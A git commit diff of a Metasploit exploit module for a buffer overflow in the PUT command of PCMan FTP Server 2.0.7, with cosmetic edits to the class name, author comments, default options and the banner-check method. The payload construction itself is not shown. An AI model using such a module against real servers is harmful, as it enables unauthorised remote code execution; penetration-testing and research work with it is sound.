Few updates per OJ and wvu

bug/bundler_fix
Chris Higgins 2016-01-26 23:19:18 -06:00
parent 3cab27086f
commit 2df458c359
1 changed files with 7 additions and 8 deletions

View File

@ -5,14 +5,14 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::Ftp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'PCMAN FTP Server v2.0.7 Buffer Overflow - PUT Command', 'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',
'Description' => %q{ 'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PUT command of the This module exploits a buffer overflow vulnerability found in the PUT command of the
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Author' => 'Author' =>
[ [
'Jay Turla @shipcod3', # Initial Discovery 'Jay Turla', # Initial Discovery -- @shipcod3
'Chris Higgins @ch1gg1ns' # msf Module 'Chris Higgins' # msf Module -- @ch1gg1ns
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
@ -30,8 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'process', 'EXITFUNC' => 'process'
'VERBOSE' => true
}, },
'Payload' => 'Payload' =>
{ {
@ -57,9 +56,9 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect disconnect
if /220 PCMan's FTP Server 2\.0/ === banner if /220 PCMan's FTP Server 2\.0/ === banner
return Exploit::CheckCode::Appears Exploit::CheckCode::Appears
else else
return Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
end end